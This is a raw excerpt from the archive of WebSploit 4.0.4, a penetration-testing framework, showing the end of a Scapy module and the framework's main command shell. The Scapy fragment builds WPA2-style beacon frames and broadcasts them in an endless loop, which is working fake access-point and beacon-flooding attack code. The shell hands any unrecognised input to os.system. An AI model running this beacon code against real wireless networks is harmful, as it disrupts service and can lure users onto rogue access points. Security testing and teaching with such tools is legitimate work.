info=( '\x01\x00' # RSN Version 1 '\x00\x0f\xac\x02' # Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' # 2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' # AES Cipher '\x00\x0f\xac\x02' # TKIP Cipher '\x01\x00' # 1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' # Pre-Shared Key '\x00\x00')) # RSN Capabilities (no extra capabilities) frame = RadioTap()/dot11/beacon/essid/rsn sendp(frame, inter=0.1, iface=self.iface, loop=1) websploit-4.0.4/websploit/websploit.py000077500000000000000000000036761361673770100201530ustar00rootroot00000000000000#!/usr/bin/python3 # check dependencies before start from .core.utils import check_dependencies check_dependencies() import cmd import os from .modules import * from .modules import module_list, all_modules from .core.utils import logo, CPrint, about, update completions = module_list() class Main(cmd.Cmd): # check for update update(where="main_menu") intro = logo() cp = CPrint() prompt = 'wsf > ' doc_header = 'Commands' undoc_header = 'Undocumented Commands' def do_use(self, line): """Select module for modules""" if line in module_list(): module = globals()[line] if hasattr(module, 'Main'): module = module.Main() module.prompt = f"wsf > {line} > " module.cmdloop() else: self.cp.error(text=f"*** Module `{module}` not has `Main` class!") else: self.cp.warning(text=f"*** Module {line} not found!") def do_show(self, line): """Show available modules""" all_modules() def do_exit(self, line): """Exit""" return True def complete_use(self, text, line, begidx, endidx): mline = line.partition(' ')[2] offs = len(mline) - len(text) return [s[offs:] for s in completions if s.startswith(mline)] def default(self, line): cmd, arg, line = self.parseline(line) func = [getattr(self, n) for n in self.get_names() if n.startswith('do_' + cmd)] if func: # maybe check if exactly one or more elements, and tell the user func[0](arg) else: os.system(line) def do_about(self, line): """About Us""" about() def do_update(self, line): """Check for update""" update(where="update_command") def start_wsf(): try: Main().cmdloop() except KeyboardInterrupt: print("\nBye!") if __name__ == '__main__': start_wsf()